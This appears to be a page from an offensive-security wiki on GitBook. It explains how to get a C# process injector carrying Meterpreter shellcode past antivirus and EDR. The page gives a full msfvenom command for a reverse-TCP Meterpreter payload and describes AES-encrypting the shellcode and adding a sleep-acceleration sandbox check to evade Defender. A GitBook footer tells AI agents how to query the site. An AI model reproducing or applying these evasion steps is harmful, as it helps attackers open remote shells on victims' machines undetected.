> For the complete documentation index, see [llms.txt](https://rfc1918.gitbook.io/offsec/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rfc1918.gitbook.io/offsec/defence-evasion/anti-virus-evasion/evasion-and-bypassing-detection-within-c.md).

# Evasion and bypassing detection within C\#

## Overview

AV and EDR bypass techniques for C# assembly payloads.

## Experiment

In this experiment we will be using the NTAPI injector as our baseline. 

{% content-ref url="/pages/zcnaefpTGZz8T2zoRRxC" %}
[Using NTAPI Undocumented Functions](/offsec/execution/c-.net-assembly/process-injection/using-ntapi-undocumented-functions.md)
{% endcontent-ref %}

### Msfvenom payload

```bash
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 -f raw EXITFUNC=thread -o shellcode.bin
```

### Injector without any shellcode

For our baseline we tested the raw injector code without any shellcode in the payload.

<figure><img src="/files/MjOhKoq7ma6OIwrQSuQ4" alt=""><figcaption></figcaption></figure>

### Raw Meterpreter payload shellcode

Running injector with raw Meterpreter shellcode.

<figure><img src="/files/zIh7ItVb5RkRm812WGnP" alt=""><figcaption></figcaption></figure>

### Using AES encryption

Encrypting the shellcode using AES&#x20;

{% content-ref url="/pages/1rwkFoTLPIVz2E31kg6M" %}
[Aes encryptor](/offsec/defence-evasion/anti-virus-evasion/evasion-and-bypassing-detection-within-c/encryptors/aes-encryptor.md)
{% endcontent-ref %}

<figure><img src="/files/SJUaz00VRc4eayOR4e1j" alt=""><figcaption></figcaption></figure>

### Runner it twice and defender is not so nice

So interesting, when executing it a second time Defenders behavioral analysis flagged and blocked execution.

Adding a sleep accelerator check to bypass sandboxing seems to do the trick to bypass this a second time.&#x20;

{% content-ref url="/pages/0tsS3qdV4OKDjSaSBC12" %}
[Time accelerated checks](/offsec/defence-evasion/anti-virus-evasion/evasion-and-bypassing-detection-within-c/sandbox-evasion/time-accelerated-checks.md)
{% endcontent-ref %}

<figure><img src="/files/y1lc86Z0qaahUXem6hJp" alt=""><figcaption></figcaption></figure>

## References&#x20;

{% content-ref url="/pages/MWi4Jv5tjMaoEhRE2KSn" %}
[C# .Net Assembly](/offsec/execution/c-.net-assembly.md)
{% endcontent-ref %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rfc1918.gitbook.io/offsec/defence-evasion/anti-virus-evasion/evasion-and-bypassing-detection-within-c.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.